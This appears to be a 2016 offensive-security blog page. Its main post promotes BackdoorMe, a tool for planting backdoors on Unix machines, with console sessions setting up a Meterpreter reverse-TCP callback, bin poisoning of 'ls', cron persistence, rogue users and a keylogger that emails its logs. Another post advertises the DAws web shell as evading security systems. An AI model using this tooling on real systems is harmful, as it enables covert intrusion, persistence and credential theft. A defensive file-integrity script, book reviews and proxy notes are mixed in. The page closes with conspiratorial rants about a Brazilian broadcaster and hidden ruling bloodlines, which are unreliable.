SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration testing and security assessment oriented Ubuntu-based Linux distribution providing a network and information systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution built from Debian Squeeze. For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large number of cyber security tools. It is an open-source distro created specifically for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...

Monday, January 11, 2016

BackdoorMe - Powerful Auto-Backdooring Utility



Backdoorme is a powerful utility capable of backdooring Unix machines with a slew of backdoors. Backdoorme uses a familiar metasploit interface with tremendous extensibility.

Backdoorme relies on having an existing SSH connection or credentials to the victim, through which it will transfer and deploy any backdoors. In the future, this reliance will be removed as the tool is expanded. To set up SSH, please see here: https://help.ubuntu.com/community/SSH/OpenSSH/Configuring

Please only use Backdoorme with explicit permission - please don't hack without asking.



Usage

Backdoorme comes with a number of built-in backdoors, modules, and auxiliary modules. Backdoors are specific components to create and deploy a specific backdoor, such as a netcat backdoor or msfvenom backdoor. Modules can be applied to any backdoor, and are used to make backdoors more potent, stealthy, or more readily tripped. Auxiliaries are useful operations that could be performed to help persistence.

To start backdoorme, first ensure that you have the required dependencies.

$ python dependencies.py

Launching backdoorme:

$ python master.py    
 ___           __      __              __  ___
/ _ )___ _____/ /_____/ /__ ___ ____/ |/ /__
/ _ / _ `/ __/ '_/ _ / _ \/ _ \/ __/ /|_/ / -_)
/____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/ /_/\__/

Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands.
Type "addtarget" to set a target, and "open" to open an SSH connection to that target.
Using local IP of 10.1.0.1.
>>

To add a target:


>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>

Backdoors

To use a backdoor, simply run the "use" keyword.


>> use metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>

From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.


(msf) >> show options
Backdoor options:

Option      Value                               Description                         Required
------      -----                               -----------                         --------
name        initd                               name of the backdoor                False
format      elf                                 format to write the backdoor to     True
lhost       10.1.0.1                            local IP to connect back to         True
encoder     none                                encoder to use for the backdoor     False
lport       4444                                local port to connect back on       True
payload     linux/x86/meterpreter/reverse_tcp   payload to deploy in backdoor       True

(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:

Option      Value       Description                 Required
------      -----       -----------                 --------
name        apache      name of the backdoor        False
...

Currently enabled backdoors include:
  • Bash
  • Bash2 (more reliable)
  • Metasploit
  • Netcat
  • Netcat-traditional
  • Perl
  • Php (does not automatically install a web server, but use the web module!)
  • Pupy
  • Python
  • Web (php - not the same backdoor as the above php backdoor)

Modules

Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.

(msf) >> add poison
+ Poison module added

Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.


(msf) >> help
...
Poison module options:

Option      Value       Description                         Required
------      -----       -----------                         --------
name        ls          name of command to poison           False
location    /bin        where to put poisoned files into    False


Currently enabled modules include:
  • Poison
    • Performs bin poisoning on the target computer - it compiles an executable that calls a system utility and an existing backdoor.
    • For example, if the bin poisoning module is triggered with "ls", it would compile and move into place a binary called "ls" that runs both an existing backdoor and the original "ls", so that ordinary use of the system causes the user to trip the existing backdoor more frequently.
  • Cron
    • Adds an existing backdoor to the root user's crontab to run with a given frequency.
  • Web
    • Sets up a web server and places a web page which triggers the backdoor.
    • Simply visit the site with your listener open and the backdoor will begin.
  • Keylogger
    • Ships a keylogger to the target and starts it.
    • Given the option to email the results to you every hour.
  • User
    • Adds a new user to the target.
  • Startup
    • Allows for backdoors to be spawned with the bashrc and init files.
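The Poison module above works by replacing a system utility such as "ls" in a directory like /bin with a wrapper that also launches a backdoor. From the defender's side, that kind of change is exactly what a file-integrity audit against a trusted manifest catches. The script below is an added example written for this page, not code from the BackdoorMe project: it snapshots a directory as SHA-256 digests, then reports files whose digest changed, files that appeared without a manifest entry, and manifest entries that vanished. The fake bin directory, its file contents and the names it uses are all constructed for the demonstration; in a real deployment the manifest would come from a trusted source (package metadata or a build pipeline), not from the host being audited.

```python
"""Defender-side integrity audit for a directory of binaries.

Added example for this page (not part of BackdoorMe). Compares every regular
file in a directory against a known-good manifest of SHA-256 digests and
reports three classes of finding:
  modified   -- a file whose digest no longer matches the manifest
  unexpected -- a file present on disk but absent from the manifest
  missing    -- a manifest entry with no file on disk
All paths and contents used in run_demo() are constructed stand-ins.
"""
import hashlib
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str) -> str:
    """Return the hex SHA-256 digest of a file, read in 64 KiB chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(directory: str) -> Dict[str, str]:
    """Snapshot a directory as {filename: sha256}, regular files only."""
    return {
        name: sha256_file(os.path.join(directory, name))
        for name in sorted(os.listdir(directory))
        if os.path.isfile(os.path.join(directory, name))
    }


def audit_bin_dir(directory: str, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the directory's current state with the trusted manifest."""
    current = build_manifest(directory)
    return {
        "modified": sorted(n for n, d in current.items()
                           if n in manifest and manifest[n] != d),
        "unexpected": sorted(n for n in current if n not in manifest),
        "missing": sorted(n for n in manifest if n not in current),
    }


def run_demo() -> Dict[str, List[str]]:
    """Build a constructed fake /bin with ls, cat and sh, take the baseline,
    then simulate the three tampering classes and return the audit result."""
    with tempfile.TemporaryDirectory() as fake_bin:
        for name in ("ls", "cat", "sh"):
            with open(os.path.join(fake_bin, name), "wb") as fh:
                fh.write(b"#!/bin/sh\n# constructed stand-in for " + name.encode() + b"\n")
        manifest = build_manifest(fake_bin)

        # Simulated bin poisoning: "ls" is swapped for a wrapper (text stand-in,
        # not a real binary), an extra file named "apache" appears, and "cat"
        # goes missing. Each should land in a different finding category.
        with open(os.path.join(fake_bin, "ls"), "wb") as fh:
            fh.write(b"#!/bin/sh\n# constructed: wrapper that runs more than ls\n")
        with open(os.path.join(fake_bin, "apache"), "wb") as fh:
            fh.write(b"constructed unexpected file\n")
        os.remove(os.path.join(fake_bin, "cat"))

        return audit_bin_dir(fake_bin, manifest)


if __name__ == "__main__":
    for kind, names in run_demo().items():
        print(f"{kind:>10}: {names}")
```

Because the wrapper keeps the original utility's name and behaviour, a user sees nothing odd at the shell; only the digest comparison (or the equivalent `dpkg -V` / `rpm -Va` style check) reveals the swap, which is why the baseline must be stored off-host.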

Auxiliaries

In order to have persistence be more potent, some users may wish to install certain services on a target. To apply an auxiliary module, use the "apply" keyword.


>> apply user
+ User Auxiliary Module added.

Auxiliaries also support the use of modules, so they can be triggered more stealthily or more often.


>> (user) add startup
+ Startup Module added.

Currently enabled auxiliaries include:
  • User
    • Adds a new user to the target.

Targets

Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target.




Mastering Kali Linux - For Advanced Penetration Testing



This is undoubtedly one of the best-written books of its kind. Like the previous book it also covers Kali Linux, but in a different manner. You might prefer a different way of learning, so this can be a good choice for you.

It provides crisp and clear writing with relevant examples, along with a humorous touch to enliven a dry and mundane subject. The contents of the book are well organized, neither too chatty nor too dry. However, you need some basic networking background to get the full benefit from this book.





By Offensive Sec

Sunday, January 10, 2016

The Hacker Playbook 2 - Practical Guide To Penetration Testing



Surprisingly, the second edition of the book is not just a simple edit. The writer has put much effort into this book to stand out from the crowd and make it a real sequel to the legacy that The Hacker Playbook 1 left behind. Not only will you learn some amazing techniques, but there are also many more new techniques than in the previous print.

This could be your Guru Book for the time. I have personally read it and would give a 5-Star rating easily.

Unlike other books, this one covers a broad variety of tools and methods of penetration testing, where other books may be useful to you for covering the verticals of a specific tool or technique. This book outperforms any other book on penetration testing for beginners and advanced penetration testers alike.





By Offensive Sec

DAws - Advanced Web Shell


About

There are several things that make DAws better than every other Web Shell out there:

º Bypasses Security Systems using various methods.
º Drops CGI Shells and communicates with them to bypass Security Systems.
º Uses the SSH Authorized Keys method to bypass Security Systems.
º Uses Shellshock to bypass Security Systems.
º Is completely POST based and uses XOR encryption based on a random key that gets generated with every new session, plus private base64 functions, to bypass Security Systems.
º Supports Windows and Linux.
º Finds a writeable and readable directory and moves there if it is a web directory.
º Drops a php.ini and a .htaccess file that clears all disablers in case "suphp" is installed.
º Has an advanced File Manager.
º Almost everything is done automatically (when it comes to command or script execution).



Credits:

º dotcppfile
º Aces who helped me code the old version of DAws
º Vedu for checking and reporting bugs.


     





Hackazon - A Modern Vulnerable Web App




Hackazon is a free, vulnerable test site that is an online storefront built with the same technologies used in today's rich client and mobile applications. Hackazon has an AJAX interface, strict workflows and RESTful APIs used by a companion mobile app, providing a uniquely effective training and testing ground for IT security professionals. And it's full of your favorite vulnerabilities, like SQL injection, cross-site scripting and so on.

Today’s web and mobile applications as well as web services have a host of new technologies that are not being adequately tested for security vulnerabilities. It is critical for IT security professionals to have a vulnerable web application to use for testing the effectiveness of their tools and for honing their skills.

Hackazon enables users to configure each area of the application in order to change the vulnerability landscape, to prevent "known vuln testing" or any other form of "cheating." Since the application includes RESTful interfaces that power AJAX functionality and mobile clients (JSON, XML, GWT, and AMF), users will need to use the latest application security testing tools and techniques to discover all the vulnerabilities. Hackazon also requires detailed testing of strict workflows, like shopping carts, that are commonly used in business applications.

Installation
  1. Check out the code
  2. Set DOCUMENT_ROOT directory to /web. Make sure that htaccess and REWRITE support is enabled.
  3. Copy /assets/config/db.sample.php to /assets/config/db.php
  4. Change settings for DB connection in the /assets/config/db.php
  5. Open http://yoursitename/install
Code structure:
  • ROOT
  • assets
  • classes
  • database
  • modules
  • vendor
  • web

Intercepting Proxy - The Pappy Proxy



The Pappy (Proxy Attack Proxy Proxy) Proxy is an intercepting proxy for performing web application security testing. Its features are often similar to, or straight-up rip-offs of, those in Burp Suite. However, Burp Suite is neither open source nor a command line tool, which makes a proxy like Pappy inevitable. The project is still in its early stages, so there are bugs and only the bare minimum of features, but it should be able to do some cool stuff soon.


Installation

Pappy supports OS X and Linux (sorry Windows). Installation requires pip or some other command that can handle a setup.py with requirements. Once the requirements are installed, you can check that it installed correctly by running pappy -l to start the proxy.


$ git clone --recursive https://github.com/roglew/pappy-proxy.git
$ cd pappy-proxy
$ pip install .


Quickstart

Pappy projects take up an entire directory. Any generated scripts, exported responses, etc. will be placed in the current directory so it’s good to give your project a directory of its own. To start a project, do something like:

$ mkdir test_project
$ cd test_project 
$ pappy
Copying default config to directory
Proxy is listening on port 8000
itsPappyTime> exit
$ ls
data.db      project_config.json


And that's it! By default the proxy runs on port 8000 and is bound to localhost. You can modify the port/interface in config.json. You can list all your intercepted requests with ls, view a full request with vfq <reqid>, or view a full response with vfs <reqid>. Right now, the only command to delete requests is filter_prune, which deletes all the requests that aren't in the current context (see the sections on the context/filter strings for more information on that).

Documentation


https://roglew.github.io/pappy-proxy/



Documentary - DEFCON And Movie The Algorithm



If you have not seen them yet, be sure to check out these two great tips!
The documentary titled DEFCON: The Documentary was released in 2013 and focuses on the world of the hacking conference, which celebrated its 20th anniversary in 2012. The film follows the four days of the twentieth edition of the conference, its events and people (participants and staff), and covers the history and philosophy behind the success of DEFCON.









The movie ALGORITHM: The Hacker Movie has as its protagonist a freelance computer hacker who breaks into a secret contractor of the US government and downloads a program. He then must choose between his own curiosity and the lives of his friends.



By OffensiveSec

Documentary Prohibited - BBC About The REDE ESGOTO (Globo)



Rede Globo, also known as Rede Bobo, Rede Lobo, Rede Glóbulo, Rede Esgoto, Rede GloBosta, GloBobagem, GloBobeira, Vênus Platinada and Toda Poderosa, is a TV broadcaster that belongs to the same owners as Greece and holds 99% of the shares in Brazil, even though all Brazilian shares originate from this plague, in addition to holding patented ownership of the mind of every Brazilian.





They are the ones who make the Jornal Nacional, a program presented by two stuffed shirts who earn rivers of money with subliminal messages.




They own other countries of little importance, such as Nicaragua, where until recently the chimpanzee soap-opera writers were trained; but since those were replaced by laboratory rats, Nicaragua was turned into a dressing room for Faustão, given that his old dressing room took up the whole of Projac.

Source: Internet

By OffensiveSec 

Welcome to the planet Earth




This planet is beautiful! But it is nothing more than a big pasture for sheep and cattle, which have long been controlled by the same bloodlines of shepherds or farm owners.

Because of this, people who are evolved mentally and psychically, spiritualized in a subtle way and without doctrines, open-minded and so on...

These are not welcome here; they are considered divergent, and the hidden forces that rule here always find a way to isolate them, often through mental illness.

In general these were born awake from their very origins; they come here to do penance and with the mission of helping, and in general they do not succeed, preferring to observe and not expose themselves.
Welcome to Earth!

Source: Peter Fiuza.

By OffensiveSec
Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community